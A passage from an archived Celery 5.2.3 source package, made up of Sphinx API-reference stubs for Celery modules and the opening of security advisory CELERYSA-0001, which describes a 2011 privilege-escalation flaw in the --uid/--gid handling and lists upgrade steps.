automodule:: celery.app.registry :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.rst0000664000175000017500000000044000000000000020355 0ustar00asifasif00000000000000.. currentmodule:: celery.app .. automodule:: celery.app .. contents:: :local: Proxies ------- .. autodata:: default_app Functions --------- .. autofunction:: app_or_default .. autofunction:: enable_trace .. autofunction:: disable_trace ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.task.rst0000664000175000017500000000034200000000000021317 0ustar00asifasif00000000000000=================================== ``celery.app.task`` =================================== .. contents:: :local: .. currentmodule:: celery.app.task .. automodule:: celery.app.task :members: Task, Context, TaskType ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.app.utils.rst0000664000175000017500000000033300000000000021515 0ustar00asifasif00000000000000================================ ``celery.app.utils`` ================================ .. contents:: :local: .. currentmodule:: celery.app.utils .. automodule:: celery.app.utils :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.beat.rst0000664000175000017500000000037500000000000021461 0ustar00asifasif00000000000000================================================= ``celery.apps.beat`` ================================================= .. contents:: :local: .. currentmodule:: celery.apps.beat .. automodule:: celery.apps.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.multi.rst0000664000175000017500000000035400000000000021675 0ustar00asifasif00000000000000======================================= ``celery.apps.multi`` ======================================= .. contents:: :local: .. currentmodule:: celery.apps.multi .. automodule:: celery.apps.multi :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.apps.worker.rst0000664000175000017500000000035700000000000022057 0ustar00asifasif00000000000000======================================= ``celery.apps.worker`` ======================================= .. contents:: :local: .. currentmodule:: celery.apps.worker .. automodule:: celery.apps.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.beat.rst0000664000175000017500000000033400000000000020512 0ustar00asifasif00000000000000======================================== ``celery.beat`` ======================================== .. contents:: :local: .. currentmodule:: celery.beat .. 
automodule:: celery.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.base.rst0000664000175000017500000000033000000000000021254 0ustar00asifasif00000000000000================================ ``celery.bin.base`` ================================ .. contents:: :local: .. currentmodule:: celery.bin.base .. automodule:: celery.bin.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.beat.rst0000664000175000017500000000037600000000000021267 0ustar00asifasif00000000000000=================================================== ``celery.bin.beat`` =================================================== .. contents:: :local: .. currentmodule:: celery.bin.beat .. automodule:: celery.bin.beat :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.call.rst0000664000175000017500000000040200000000000021255 0ustar00asifasif00000000000000===================================================== ``celery.bin.call`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.call .. automodule:: celery.bin.call :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.celery.rst0000664000175000017500000000036200000000000021632 0ustar00asifasif00000000000000========================================== ``celery.bin.celery`` ========================================== .. contents:: :local: .. currentmodule:: celery.bin.celery .. automodule:: celery.bin.celery :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.control.rst0000664000175000017500000000041300000000000022024 0ustar00asifasif00000000000000===================================================== ``celery.bin.control`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.control .. automodule:: celery.bin.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.events.rst0000664000175000017500000000041000000000000021645 0ustar00asifasif00000000000000===================================================== ``celery.bin.events`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.events .. automodule:: celery.bin.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.graph.rst0000664000175000017500000000040500000000000021446 0ustar00asifasif00000000000000===================================================== ``celery.bin.graph`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.graph .. 
automodule:: celery.bin.graph :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.list.rst0000664000175000017500000000040200000000000021315 0ustar00asifasif00000000000000===================================================== ``celery.bin.list`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.list .. automodule:: celery.bin.list :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.logtool.rst0000664000175000017500000000041300000000000022023 0ustar00asifasif00000000000000===================================================== ``celery.bin.logtool`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.logtool .. automodule:: celery.bin.logtool :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.migrate.rst0000664000175000017500000000041300000000000021774 0ustar00asifasif00000000000000===================================================== ``celery.bin.migrate`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.migrate .. automodule:: celery.bin.migrate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.multi.rst0000664000175000017500000000037100000000000021501 0ustar00asifasif00000000000000=============================================== ``celery.bin.multi`` =============================================== .. contents:: :local: .. currentmodule:: celery.bin.multi .. automodule:: celery.bin.multi :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.purge.rst0000664000175000017500000000040500000000000021467 0ustar00asifasif00000000000000===================================================== ``celery.bin.purge`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.purge .. automodule:: celery.bin.purge :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.result.rst0000664000175000017500000000041000000000000021657 0ustar00asifasif00000000000000===================================================== ``celery.bin.result`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.result .. automodule:: celery.bin.result :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.shell.rst0000664000175000017500000000040500000000000021454 0ustar00asifasif00000000000000===================================================== ``celery.bin.shell`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.shell .. 
automodule:: celery.bin.shell :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.upgrade.rst0000664000175000017500000000041300000000000021773 0ustar00asifasif00000000000000===================================================== ``celery.bin.upgrade`` ===================================================== .. contents:: :local: .. currentmodule:: celery.bin.upgrade .. automodule:: celery.bin.upgrade :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bin.worker.rst0000664000175000017500000000036200000000000021660 0ustar00asifasif00000000000000========================================== ``celery.bin.worker`` ========================================== .. contents:: :local: .. currentmodule:: celery.bin.worker .. automodule:: celery.bin.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.bootsteps.rst0000664000175000017500000000035700000000000021626 0ustar00asifasif00000000000000========================================== ``celery.bootsteps`` ========================================== .. contents:: :local: .. currentmodule:: celery.bootsteps .. automodule:: celery.bootsteps :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.abortable.rst0000664000175000017500000000044200000000000023171 0ustar00asifasif00000000000000======================================================= ``celery.contrib.abortable`` ======================================================= .. contents:: :local: .. currentmodule:: celery.contrib.abortable .. automodule:: celery.contrib.abortable :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.migrate.rst0000664000175000017500000000034600000000000022671 0ustar00asifasif00000000000000============================ ``celery.contrib.migrate`` ============================ .. contents:: :local: .. currentmodule:: celery.contrib.migrate .. automodule:: celery.contrib.migrate :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.pytest.rst0000664000175000017500000000042100000000000022563 0ustar00asifasif00000000000000==================================== ``celery.contrib.pytest`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.pytest .. automodule:: celery.contrib.pytest :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.rdb.rst0000664000175000017500000000040000000000000021777 0ustar00asifasif00000000000000================================== ``celery.contrib.rdb`` ================================== .. currentmodule:: celery.contrib.rdb .. automodule:: celery.contrib.rdb .. autofunction:: set_trace .. autofunction:: debugger .. 
autoclass:: Rdb ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.sphinx.rst0000664000175000017500000000027000000000000022546 0ustar00asifasif00000000000000================================ celery.contrib.sphinx ================================ .. currentmodule:: celery.contrib.sphinx .. automodule:: celery.contrib.sphinx :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.app.rst0000664000175000017500000000044000000000000023470 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.app`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.app .. automodule:: celery.contrib.testing.app :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.manager.rst0000664000175000017500000000045400000000000024327 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.manager`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.manager .. automodule:: celery.contrib.testing.manager :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.mocks.rst0000664000175000017500000000044600000000000024032 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.mocks`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.mocks .. automodule:: celery.contrib.testing.mocks :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.contrib.testing.worker.rst0000664000175000017500000000045100000000000024223 0ustar00asifasif00000000000000==================================== ``celery.contrib.testing.worker`` ==================================== .. contents:: :local: API Reference ============= .. currentmodule:: celery.contrib.testing.worker .. automodule:: celery.contrib.testing.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.dispatcher.rst0000664000175000017500000000046000000000000023230 0ustar00asifasif00000000000000================================================================= ``celery.events.state`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.dispatcher .. automodule:: celery.events.dispatcher :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.event.rst0000664000175000017500000000044600000000000022227 0ustar00asifasif00000000000000================================================================= ``celery.events.event`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.event .. 
automodule:: celery.events.event :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.receiver.rst0000664000175000017500000000045700000000000022714 0ustar00asifasif00000000000000================================================================= ``celery.events.receiver`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.receiver .. automodule:: celery.events.receiver :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.rst0000664000175000017500000000030200000000000021076 0ustar00asifasif00000000000000======================== ``celery.events`` ======================== .. contents:: :local: .. currentmodule:: celery.events .. automodule:: celery.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.events.state.rst0000664000175000017500000000044600000000000022226 0ustar00asifasif00000000000000================================================================= ``celery.events.state`` ================================================================= .. contents:: :local: .. currentmodule:: celery.events.state .. automodule:: celery.events.state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.exceptions.rst0000664000175000017500000000033600000000000021762 0ustar00asifasif00000000000000================================ ``celery.exceptions`` ================================ .. contents:: :local: .. currentmodule:: celery.exceptions .. automodule:: celery.exceptions :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.app.rst0000664000175000017500000000034300000000000022007 0ustar00asifasif00000000000000================================= ``celery.loaders.app`` ================================= .. contents:: :local: .. currentmodule:: celery.loaders.app .. automodule:: celery.loaders.app :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.base.rst0000664000175000017500000000037200000000000022143 0ustar00asifasif00000000000000=========================================== ``celery.loaders.base`` =========================================== .. contents:: :local: .. currentmodule:: celery.loaders.base .. automodule:: celery.loaders.base :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.default.rst0000664000175000017500000000037700000000000022662 0ustar00asifasif00000000000000========================================= ``celery.loaders.default`` ========================================= .. contents:: :local: .. currentmodule:: celery.loaders.default .. 
automodule:: celery.loaders.default :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.loaders.rst0000664000175000017500000000035500000000000021233 0ustar00asifasif00000000000000============================================ ``celery.loaders`` ============================================ .. contents:: :local: .. currentmodule:: celery.loaders .. automodule:: celery.loaders :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.result.rst0000664000175000017500000000031400000000000021113 0ustar00asifasif00000000000000============================= ``celery.result`` ============================= .. contents:: :local: .. currentmodule:: celery.result .. automodule:: celery.result :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.rst0000664000175000017500000000665100000000000017610 0ustar00asifasif00000000000000=========================================== :mod:`celery` --- Distributed processing =========================================== .. currentmodule:: celery .. module:: celery :synopsis: Distributed processing .. moduleauthor:: Ask Solem .. sectionauthor:: Ask Solem -------------- This module is the main entry-point for the Celery API. It includes commonly needed things for calling tasks, and creating Celery applications. ===================== =================================================== :class:`Celery` Celery application instance :class:`group` group tasks together :class:`chain` chain tasks together :class:`chord` chords enable callbacks for groups :func:`signature` create a new task signature :class:`Signature` object describing a task invocation :data:`current_app` proxy to the current application instance :data:`current_task` proxy to the currently executing task ===================== =================================================== :class:`Celery` application objects ----------------------------------- .. versionadded:: 2.5 .. autoclass:: Celery .. autoattribute:: user_options .. autoattribute:: steps .. autoattribute:: current_task .. autoattribute:: current_worker_task .. autoattribute:: amqp .. autoattribute:: backend .. autoattribute:: loader .. autoattribute:: control .. autoattribute:: events .. autoattribute:: log .. autoattribute:: tasks .. autoattribute:: pool .. autoattribute:: producer_pool .. autoattribute:: Task .. autoattribute:: timezone .. autoattribute:: builtin_fixups .. autoattribute:: oid .. automethod:: close .. automethod:: signature .. automethod:: bugreport .. automethod:: config_from_object .. automethod:: config_from_envvar .. automethod:: autodiscover_tasks .. automethod:: add_defaults .. automethod:: add_periodic_task .. automethod:: setup_security .. automethod:: task .. automethod:: send_task .. automethod:: gen_task_name .. autoattribute:: AsyncResult .. autoattribute:: GroupResult .. autoattribute:: Worker .. autoattribute:: WorkController .. autoattribute:: Beat .. automethod:: connection_for_read .. automethod:: connection_for_write .. automethod:: connection .. automethod:: connection_or_acquire .. automethod:: producer_or_acquire .. automethod:: select_queues .. automethod:: now .. automethod:: set_current .. automethod:: set_default .. automethod:: finalize .. automethod:: on_init .. 
automethod:: prepare_config .. data:: on_configure Signal sent when app is loading configuration. .. data:: on_after_configure Signal sent after app has prepared the configuration. .. data:: on_after_finalize Signal sent after app has been finalized. .. data:: on_after_fork Signal sent in child process after fork. Canvas primitives ----------------- See :ref:`guide-canvas` for more about creating task work-flows. .. autoclass:: group .. autoclass:: chain .. autoclass:: chord .. autofunction:: signature .. autoclass:: Signature Proxies ------- .. data:: current_app The currently set app for this thread. .. data:: current_task The task currently being executed (only set in the worker, or when eager/apply is used). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.schedules.rst0000664000175000017500000000040500000000000021555 0ustar00asifasif00000000000000===================================================== ``celery.schedules`` ===================================================== .. contents:: :local: .. currentmodule:: celery.schedules .. automodule:: celery.schedules :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.security.rst0000664000175000017500000000031000000000000021440 0ustar00asifasif00000000000000======================== ``celery.security`` ======================== .. contents:: :local: .. currentmodule:: celery.security .. automodule:: celery.security :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.signals.rst0000664000175000017500000000040100000000000021232 0ustar00asifasif00000000000000====================================================== ``celery.signals`` ====================================================== .. contents:: :local: .. currentmodule:: celery.signals .. automodule:: celery.signals :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.states.rst0000664000175000017500000000015200000000000021100 0ustar00asifasif00000000000000.. currentmodule:: celery.states .. contents:: :local: .. automodule:: celery.states :members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.utils.debug.rst0000664000175000017500000000154700000000000022033 0ustar00asifasif00000000000000==================================== ``celery.utils.debug`` ==================================== .. contents:: :local: Sampling Memory Usage ===================== This module can be used to diagnose and sample the memory usage used by parts of your application. For example, to sample the memory usage of calling tasks you can do this: .. code-block:: python from celery.utils.debug import sample_mem, memdump from tasks import add try: for i in range(100): for j in range(100): add.delay(i, j) sample_mem() finally: memdump() API Reference ============= .. currentmodule:: celery.utils.debug .. automodule:: celery.utils.debug .. autofunction:: sample_mem .. autofunction:: memdump .. autofunction:: sample .. autofunction:: mem_rss .. 
autofunction:: ps ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.agent.rst0000664000175000017500000000044300000000000024040 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.agent`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.agent .. automodule:: celery.worker.consumer.agent :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.connection.rst0000664000175000017500000000046200000000000025102 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.connection`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.connection .. automodule:: celery.worker.consumer.connection :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.consumer.rst0000664000175000017500000000045400000000000024577 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.consumer`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.consumer .. automodule:: celery.worker.consumer.consumer :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.control.rst0000664000175000017500000000045100000000000024421 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.control`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.control .. automodule:: celery.worker.consumer.control :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.events.rst0000664000175000017500000000044600000000000024251 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.events`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.events .. automodule:: celery.worker.consumer.events :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.gossip.rst0000664000175000017500000000044600000000000024251 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.gossip`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.gossip .. 
automodule:: celery.worker.consumer.gossip :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.heart.rst0000664000175000017500000000044300000000000024045 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.heart`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.heart .. automodule:: celery.worker.consumer.heart :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.mingle.rst0000664000175000017500000000044600000000000024220 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.mingle`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.mingle .. automodule:: celery.worker.consumer.mingle :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.rst0000664000175000017500000000042100000000000022737 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer .. automodule:: celery.worker.consumer :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.consumer.tasks.rst0000664000175000017500000000044300000000000024067 0ustar00asifasif00000000000000================================================== ``celery.worker.consumer.tasks`` ================================================== .. contents:: :local: .. currentmodule:: celery.worker.consumer.tasks .. automodule:: celery.worker.consumer.tasks :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.request.rst0000664000175000017500000000036400000000000022602 0ustar00asifasif00000000000000===================================== ``celery.worker.request`` ===================================== .. contents:: :local: .. currentmodule:: celery.worker.request .. automodule:: celery.worker.request :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.rst0000664000175000017500000000034200000000000021107 0ustar00asifasif00000000000000======================================== ``celery.worker`` ======================================== .. contents:: :local: .. currentmodule:: celery.worker .. automodule:: celery.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.state.rst0000664000175000017500000000035400000000000022231 0ustar00asifasif00000000000000==================================== ``celery.worker.state`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.state .. 
automodule:: celery.worker.state :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.strategy.rst0000664000175000017500000000036500000000000022755 0ustar00asifasif00000000000000==================================== ``celery.worker.strategy`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.strategy .. automodule:: celery.worker.strategy :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/celery.worker.worker.rst0000664000175000017500000000035700000000000022425 0ustar00asifasif00000000000000==================================== ``celery.worker.worker`` ==================================== .. contents:: :local: .. currentmodule:: celery.worker.worker .. automodule:: celery.worker.worker :members: :undoc-members: ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/cli.rst0000664000175000017500000000021700000000000017064 0ustar00asifasif00000000000000======================= Command Line Interface ======================= .. click:: celery.bin.celery:celery :prog: celery :nested: full ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/reference/index.rst0000664000175000017500000000364000000000000017427 0ustar00asifasif00000000000000.. _apiref: =============== API Reference =============== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 1 cli celery celery.app celery.app.task celery.app.amqp celery.app.defaults celery.app.control celery.app.registry celery.app.backends celery.app.builtins celery.app.events celery.app.log celery.app.utils celery.app.autoretry celery.bootsteps celery.result celery.schedules celery.signals celery.security celery.utils.debug celery.exceptions celery.loaders celery.loaders.app celery.loaders.default celery.loaders.base celery.states celery.contrib.abortable celery.contrib.migrate celery.contrib.pytest celery.contrib.sphinx celery.contrib.testing.worker celery.contrib.testing.app celery.contrib.testing.manager celery.contrib.testing.mocks celery.contrib.rdb celery.events celery.events.receiver celery.events.dispatcher celery.events.event celery.events.state celery.beat celery.apps.worker celery.apps.beat celery.apps.multi celery.worker celery.worker.request celery.worker.state celery.worker.strategy celery.worker.consumer celery.worker.consumer.agent celery.worker.consumer.connection celery.worker.consumer.consumer celery.worker.consumer.control celery.worker.consumer.events celery.worker.consumer.gossip celery.worker.consumer.heart celery.worker.consumer.mingle celery.worker.consumer.tasks celery.worker.worker celery.bin.base celery.bin.celery celery.bin.worker celery.bin.beat celery.bin.events celery.bin.logtool celery.bin.amqp celery.bin.graph celery.bin.multi celery.bin.call celery.bin.control celery.bin.list celery.bin.migrate celery.bin.purge celery.bin.result celery.bin.shell celery.bin.upgrade ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/sec/0000775000175000017500000000000000000000000014377 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/docs/sec/CELERYSA-0001.txt0000664000175000017500000000555100000000000016733 0ustar00asifasif00000000000000========================================= CELERYSA-0001: Celery Security Advisory ========================================= :contact: security@celeryproject.org :author: Ask Solem :CVE id: CVE-2011-4356 :date: 2011-11-25 04:35:00 p.m. GMT Details ======= :package: celery :vulnerability: privilege escalation :problem type: local :risk: medium :bug-no: Celery #544 :versions-affected: 2.1, 2.2, 2.3, 2.4 Description =========== The --uid and --gid arguments to the celeryd-multi, celeryd_detach, celerybeat and celeryev programs shipped with Celery versions 2.1 and later wasn't handled properly: only the effective user was changed, with the real id remaining unchanged. In practice for affected users the vulnerability means that malicious code loaded in the worker process would be allowed to escalate privileges. We take this issue seriously since the Pickle serializer used by default makes it possible to execute arbitrary code. We recommend that users takes steps to secure their systems so that malicious users cannot abuse the message broker to send messages, or disable the pickle serializer used in Celery so that arbitrary code execution isn't possible. Patches are now available for all maintained versions (see below), and users are urged to upgrade, even if not directly affected. Systems affected ================ Users of Celery versions 2.1, 2.2, 2.3, 2.4; except the recently released 2.2.8, 2.3.4, and 2.4.4, daemonizing the Celery programs as the root user, using either: 1) the --uid or --gid arguments, or 2) the provided generic init-scripts with the environment variables CELERYD_USER or CELERYD_GROUP defined, are affected. Users using the Debian init-scripts, CentOS init-scripts, macOS launchctl scripts, Supervisor, or users not starting the programs as the root user are *not* affected. Solution ======== Users of the 2.4 series should upgrade to 2.4.4: * ``pip install -U celery``, or * ``easy_install -U celery``, or * https://pypi.org/project/celery/2.4.4/ Users of the 2.3 series should upgrade to 2.3.4: * ``pip install -U celery==2.3.4``, or * ``easy_install -U celery==2.3.4``, or * https://pypi.org/project/celery/2.3.4/ Users of the 2.2 series should upgrade to 2.2.8: * ``pip install -U celery==2.2.8``, or * ``easy_install -U celery==2.2.8``, or * https://pypi.org/project/celery/2.2.8/ The 2.1 series is no longer being maintained, so we urge users of that series to upgrade to a more recent version. Distribution 